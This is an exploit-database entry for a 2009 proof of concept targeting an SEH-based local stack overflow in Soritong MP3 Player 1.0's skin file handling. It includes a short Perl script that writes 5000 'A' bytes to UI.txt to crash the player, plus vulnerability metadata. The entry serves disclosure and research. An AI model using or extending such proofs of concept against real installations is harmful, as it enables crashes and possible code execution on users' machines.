header-logo
Suggest Exploit
vendor:
Soritong MP3 Player
by:
ThE g0bL!N
7.5
CVSS
HIGH
Local Stack Overflow
CWE
Product Name: Soritong MP3 Player
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2009

Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (Seh)

This is a proof-of-concept exploit for a local stack overflow vulnerability in Soritong MP3 Player 1.0. The exploit triggers a stack overflow by sending a specially crafted skin file. This vulnerability can be exploited to execute arbitrary code or crash the program.

Mitigation:

Update to a patched version of Soritong MP3 Player or apply any available security patches.
Source

Exploit-DB raw data:

#Soritong MP3 Player 1.0 (SKIN) Local Stack Overflow PoC (Seh)
#First:http://milw0rm.com/exploits/8624
#By: ThE g0bL!N
my $crash="\x41" x 5000 ; # just random
open(myfile,'>>UI.txt') ;
print myfile $crash;
# Usage: After Clicking On file Perl Copy TXT File on this Diredtory skin\default\ Then Run The Program Boom !!!!!!! the Program Crashed
# Note : The Bug is Seh :)

# milw0rm.com [2009-07-17]

Navigation

Suggest Exploit

Services By CQR